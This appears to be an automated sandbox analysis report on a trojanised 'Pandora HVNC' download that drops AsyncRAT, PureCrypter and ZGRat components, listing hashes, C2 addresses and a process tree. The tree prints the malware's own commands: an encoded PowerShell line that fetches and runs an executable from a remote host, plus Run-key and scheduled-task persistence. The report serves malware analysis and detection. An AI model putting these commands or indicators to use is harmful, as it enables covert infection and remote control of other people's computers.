Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20231025-en
  • resource tags

    arch:x64arch:x86image:win7-20231025-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2023 14:11

General

  • Target

    Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx-main/Pandora Hvnc Hidden B Vnc/H.scr

  • Size

    799KB

  • MD5

    98d7999986d63fbd914bddc3d7b7ecf9

  • SHA1

    7c528fb3cc427791482f7a84923a21621cfb9675

  • SHA256

    144a026bb63a29b36a3437094c4f53cf1cb135edcbe15ab06e35fb8759129bfc

  • SHA512

    13bb42bf2078b3407af5786e9c1d057a306cba561519f905e4ba3fa1acaf8687551c70941775daa89394384808b6524659cda354a715e5ab3c3cba558c065616

  • SSDEEP

    12288:v41SrH22qla5w/yXbxixFcRMFQIkeNCSo9mbX8:v0SrH0MW/IbxiYCQIkeNCSBQ

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

C2

217.64.31.3:8808

217.64.31.3:8437

Mutex

Windows System Guard Runtime

Attributes
  • delay

    3

  • install

    false

  • install_file

    Windows Session Manager

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect PureCrypter injector 1 IoCs
  • Detect ZGRat V1 5 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • PureCrypter

    PureCrypter is a .NET malware loader first seen in early 2021.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • Async RAT payload 5 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx-main\Pandora Hvnc Hidden B Vnc\H.scr
    "C:\Users\Admin\AppData\Local\Temp\Pandora-Hvnc-Hidden-Browser-Real-Vnc-Working-Chromium-Edge-Opera-Gx-main\Pandora Hvnc Hidden B Vnc\H.scr" /S
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Users\Admin\AppData\Roaming\REALFINAL.EXE
      "C:\Users\Admin\AppData\Roaming\REALFINAL.EXE"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2228
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /nobreak /t 20
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2728
        • C:\Windows\SysWOW64\timeout.exe
          timeout /nobreak /t 20
          4⤵
          • Delays execution with timeout.exe
          PID:2628
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout 40
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\SysWOW64\timeout.exe
          timeout 40
          4⤵
          • Delays execution with timeout.exe
          PID:2784
      • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe
        "C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2536
        • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE
          "C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBhACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBiAGkAbgAyAC4AYQB3AHMALgBhAHQAcwBpAGcAbgAuAGMAbABvAHUAZAAvADkAMwBpADMAbwBuADEAZAAzAGYAdABhADgAaQBqAGgALwBkAGMAXwBjAHIAeQBwAHQALgBlAHgAZQAnACwAIAA8ACMAYgBxAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBhAHkAcgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBiAG4AeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBXAGkAbgBkAG8AdwBzAFMAZQBjAHUAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAaABjAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeABuAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHcAaABqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFcAaQBuAGQAbwB3AHMAUwBlAGMAdQByAHQAeQAuAGUAeABlACcAKQA8ACMAaQBhAGsAIwA+AA=="
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:524
        • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE
          "C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:2572
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurtyService' -Value '"C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe"' -PropertyType 'String'
            5⤵
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2852
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /C schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2860
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /tn \SecurtyService /tr "C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:2124
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            #cmd
            5⤵
              PID:1980
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
          3⤵
            PID:1768
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
            3⤵
              PID:1752

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

          Filesize

          146KB

          MD5

          1a9c46f2b4420d156a82f160facf9376

          SHA1

          ce91faa7353cb4d3411b20a69350f27a6fe47990

          SHA256

          04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

          SHA512

          14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

        • C:\Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

          Filesize

          146KB

          MD5

          1a9c46f2b4420d156a82f160facf9376

          SHA1

          ce91faa7353cb4d3411b20a69350f27a6fe47990

          SHA256

          04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

          SHA512

          14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

        • C:\Users\Admin\AppData\Roaming\Ltntuhk\Zmluvhyw.exe

          Filesize

          501KB

          MD5

          8b662719e44ab11419fe3e1d7e96cc03

          SHA1

          af6c092ff304cd5131cc0295fa8b51a572af5388

          SHA256

          0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

          SHA512

          3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SKQ8SH9PK6WLLQ8WPOFJ.temp

          Filesize

          7KB

          MD5

          6baa1c1f89ab7dc9e5763a9285758faf

          SHA1

          f9ed3575555b64d10ffea68874c05d5917db64a0

          SHA256

          ed0e6a0245693d71ac5fd693d3ea2eb144d784dee532c519b7a973b4d612e278

          SHA512

          b424dc7ff1dce7cbf2daee00c5a36d5296268af70e4e595adcb56d9abfe54974815b8843af654afbc5987b6bf308075e6cfbd22dd7d45848aa05ff6f1a5938c0

        • C:\Users\Admin\AppData\Roaming\REALFINAL.EXE

          Filesize

          501KB

          MD5

          8b662719e44ab11419fe3e1d7e96cc03

          SHA1

          af6c092ff304cd5131cc0295fa8b51a572af5388

          SHA256

          0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

          SHA512

          3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

        • C:\Users\Admin\AppData\Roaming\REALFINAL.EXE

          Filesize

          501KB

          MD5

          8b662719e44ab11419fe3e1d7e96cc03

          SHA1

          af6c092ff304cd5131cc0295fa8b51a572af5388

          SHA256

          0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

          SHA512

          3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

        • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

          Filesize

          6KB

          MD5

          a0c1d68c150049944598f3927176a4b9

          SHA1

          bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1

          SHA256

          fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908

          SHA512

          c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

        • C:\Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

          Filesize

          6KB

          MD5

          a0c1d68c150049944598f3927176a4b9

          SHA1

          bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1

          SHA256

          fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908

          SHA512

          c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

        • C:\Users\Admin\AppData\Roaming\SecurtyService\SecurtyService.exe

          Filesize

          87KB

          MD5

          81230dd9258eebd0fe6a2cc681c43c51

          SHA1

          d6870e6014503e79589435d3b167f1c6e405721b

          SHA256

          9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

          SHA512

          2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

        • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

          Filesize

          87KB

          MD5

          81230dd9258eebd0fe6a2cc681c43c51

          SHA1

          d6870e6014503e79589435d3b167f1c6e405721b

          SHA256

          9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

          SHA512

          2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

        • C:\Users\Admin\AppData\Roaming\V_PROTECTED.EXE

          Filesize

          87KB

          MD5

          81230dd9258eebd0fe6a2cc681c43c51

          SHA1

          d6870e6014503e79589435d3b167f1c6e405721b

          SHA256

          9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

          SHA512

          2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

        • \Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

          Filesize

          146KB

          MD5

          1a9c46f2b4420d156a82f160facf9376

          SHA1

          ce91faa7353cb4d3411b20a69350f27a6fe47990

          SHA256

          04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

          SHA512

          14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

        • \Users\Admin\AppData\Local\Temp\Bbxodsfpqzzzzzzzzzzzzzzzz.exe

          Filesize

          146KB

          MD5

          1a9c46f2b4420d156a82f160facf9376

          SHA1

          ce91faa7353cb4d3411b20a69350f27a6fe47990

          SHA256

          04d9e48a22db735eb74df9d53acd9bf6330cc4842b0e136767ac5ea1695250fd

          SHA512

          14cc02a0bf3822888f69743ae946018eeb3c0bbced4e9f9edabf6b9a44013ecb708585f5ca3145add251bf1053c67f38e5f9d7abfe9d822e38f59b3188a62685

        • \Users\Admin\AppData\Roaming\REALFINAL.EXE

          Filesize

          501KB

          MD5

          8b662719e44ab11419fe3e1d7e96cc03

          SHA1

          af6c092ff304cd5131cc0295fa8b51a572af5388

          SHA256

          0e3be9658e97e3ea844e0d818a0f4731573ec5affe4f42e8d244e0c91717df68

          SHA512

          3a441802fad9b3eafe327d6239cb8891551df04ccf555658d8855fbbcdacda3abefc9e627b3a59cf28de9681e348d2cc749cd63514721c9b86e0519ceb57309a

        • \Users\Admin\AppData\Roaming\SOFTINCA CRYPT.EXE

          Filesize

          6KB

          MD5

          a0c1d68c150049944598f3927176a4b9

          SHA1

          bb27c0d5385e8cb803fe63b958b95d6f78f7c8e1

          SHA256

          fb79b16cda58da4af5d374a6b1a9897e880ec01d97122902b35cc94933fc8908

          SHA512

          c503525cf9e3c1704da899ef1162094819287c82a52c953a9df4340335ce9edbabef6b4cc91d12a34ac69e9fa4b1bafa82aceece849aa2a12051f89714e3cc53

        • \Users\Admin\AppData\Roaming\V_PROTECTED.EXE

          Filesize

          87KB

          MD5

          81230dd9258eebd0fe6a2cc681c43c51

          SHA1

          d6870e6014503e79589435d3b167f1c6e405721b

          SHA256

          9d0e865de1feea37767b57b0b7c68ce143b72b071e0201af051e02d64c33ead1

          SHA512

          2c11be14d9f6a6d5011dfcf67b7115e3ad04e267eb7ced0b9fd7f9e286f87e553b9fae6f1a3a9a491d5ff7e96ac01a108fd52097ae6b3a44e7ca68315b70d96a

        • memory/524-76-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/524-78-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/524-98-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

          Filesize

          9.6MB

        • memory/524-77-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/524-75-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

          Filesize

          9.6MB

        • memory/524-73-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/524-72-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

          Filesize

          9.6MB

        • memory/524-68-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/524-67-0x000007FEF5470000-0x000007FEF5E0D000-memory.dmp

          Filesize

          9.6MB

        • memory/524-66-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

          Filesize

          32KB

        • memory/524-65-0x000000001B430000-0x000000001B712000-memory.dmp

          Filesize

          2.9MB

        • memory/524-64-0x00000000029C0000-0x0000000002A40000-memory.dmp

          Filesize

          512KB

        • memory/1752-87-0x0000000000400000-0x000000000042E000-memory.dmp

          Filesize

          184KB

        • memory/1752-83-0x0000000000400000-0x000000000042E000-memory.dmp

          Filesize

          184KB

        • memory/1752-93-0x0000000074140000-0x000000007482E000-memory.dmp

          Filesize

          6.9MB

        • memory/1752-97-0x00000000003C0000-0x0000000000400000-memory.dmp

          Filesize

          256KB

        • memory/1752-81-0x0000000000400000-0x000000000042E000-memory.dmp

          Filesize

          184KB

        • memory/1752-95-0x0000000074140000-0x000000007482E000-memory.dmp

          Filesize

          6.9MB

        • memory/1752-92-0x0000000000400000-0x000000000042E000-memory.dmp

          Filesize

          184KB

        • memory/1752-85-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/1752-80-0x0000000000400000-0x000000000042E000-memory.dmp

          Filesize

          184KB

        • memory/1752-79-0x0000000000400000-0x000000000042E000-memory.dmp

          Filesize

          184KB

        • memory/1752-94-0x00000000003C0000-0x0000000000400000-memory.dmp

          Filesize

          256KB

        • memory/1752-90-0x0000000000400000-0x000000000042E000-memory.dmp

          Filesize

          184KB

        • memory/1980-47-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/1980-48-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

          Filesize

          4KB

        • memory/1980-50-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/1980-45-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/1980-46-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/1980-52-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/1980-56-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/1980-44-0x0000000000400000-0x0000000000412000-memory.dmp

          Filesize

          72KB

        • memory/2228-8-0x00000000002F0000-0x0000000000372000-memory.dmp

          Filesize

          520KB

        • memory/2228-10-0x00000000006A0000-0x00000000006E0000-memory.dmp

          Filesize

          256KB

        • memory/2228-11-0x0000000074140000-0x000000007482E000-memory.dmp

          Filesize

          6.9MB

        • memory/2228-9-0x0000000074140000-0x000000007482E000-memory.dmp

          Filesize

          6.9MB

        • memory/2228-12-0x00000000006A0000-0x00000000006E0000-memory.dmp

          Filesize

          256KB

        • memory/2228-14-0x0000000002140000-0x000000000218C000-memory.dmp

          Filesize

          304KB

        • memory/2228-13-0x0000000004E70000-0x0000000004EE4000-memory.dmp

          Filesize

          464KB

        • memory/2228-89-0x0000000074140000-0x000000007482E000-memory.dmp

          Filesize

          6.9MB

        • memory/2456-41-0x0000000000C40000-0x0000000000C48000-memory.dmp

          Filesize

          32KB

        • memory/2456-58-0x000007FEF54C0000-0x000007FEF5EAC000-memory.dmp

          Filesize

          9.9MB

        • memory/2456-55-0x000007FEF54C0000-0x000007FEF5EAC000-memory.dmp

          Filesize

          9.9MB

        • memory/2572-39-0x0000000074140000-0x000000007482E000-memory.dmp

          Filesize

          6.9MB

        • memory/2572-53-0x0000000074140000-0x000000007482E000-memory.dmp

          Filesize

          6.9MB

        • memory/2572-38-0x0000000000EB0000-0x0000000000ECC000-memory.dmp

          Filesize

          112KB

        • memory/2852-69-0x00000000026F0000-0x0000000002730000-memory.dmp

          Filesize

          256KB

        • memory/2852-70-0x00000000026F0000-0x0000000002730000-memory.dmp

          Filesize

          256KB

        • memory/2852-71-0x00000000026F0000-0x0000000002730000-memory.dmp

          Filesize

          256KB

        • memory/2852-74-0x000000006F3D0000-0x000000006F97B000-memory.dmp

          Filesize

          5.7MB

        • memory/2852-63-0x000000006F3D0000-0x000000006F97B000-memory.dmp

          Filesize

          5.7MB

        • memory/2852-57-0x000000006F3D0000-0x000000006F97B000-memory.dmp

          Filesize

          5.7MB